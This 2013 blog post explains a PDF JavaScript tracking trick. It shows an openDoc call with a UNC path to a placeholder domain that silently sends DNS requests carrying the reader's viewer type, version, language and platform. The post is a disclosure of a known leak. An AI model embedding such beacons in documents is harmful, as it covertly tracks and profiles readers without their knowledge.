• PDF Beacons with JavaScript openDoc API

    by  • May 2, 2013 • Uncategorized

    I saw earlier in the week that McAfee had disclosed a information leak through one of the PDF JavaScript APIs. While it wasn’t exactly spelled out, I recognized the bug description as one I had reversed back in May of 2012. Why didn’t it hit the public then? Well, it wasn’t that interesting and I felt like the tracking capability was worthwhile, especially when documents were getting stolen. It seems this capability will be gone in a few days/weeks, so to the blog it goes.

    The document I received back in May seemed to be created by one of the email tracking services and had some generic theme. The JavaScript used was pretty heavily obfuscated, but after an hour or two I ended up with a version checking tree to assist reader in which method to use for outbound communications. What struck me as interesting was the final call using the “openDoc” method which I had previously worked with to leak data, but had no luck.

    In the code I dealt with, openDoc was passed the arguments “cPath”, “cFS” and “bHidden”. Below are the explanations on each argument:

    •  cPath – the location of the document/path
    • cFS – the file system type to use
    • bHidden – whether or not to open the document at that path

    The code I encountered set the cPath to something like “\\your.domain.to.query\/path/to/current/document\name_of_doc_to_open.pdf”, the cFS to “DOS” and the bHidden to true, though I don’t think that matters too much.

    If executed, the document would not prompt the user and a stream of DNS requests would follow to the domain specified. What was nice about this read tracker was that it went further to collect some information about the client, but ultimately not all of it. I tooled this up for testing and included the following details to collect on:

    • ViewerType – Type of viewer the user is reading (Adobe, Web, etc.)
    • ViewVersion – Version of the PDF reader
    • AppLanguage – The PDF reader’s configured language
    • AppPlatform – Operating system used to open the PDF

    I appended these to the actual DNS request so that it looked like this:

    emitted_dns

     

    In the blog McAfee put out, they show HTTP traffic, but I was never able to get such details. There is possibly something I have missed or they are using a different call altogether or maybe Adobe 11 just handles this call differently. If you are interested in playing around with the code and a sample document, please email me or obtain the sample from VirusTotal.

    picture_of_code (1)

    I generated the sample using HeavyPint and the code mentioned above pictured above without any exploit, so it’s safe.

    About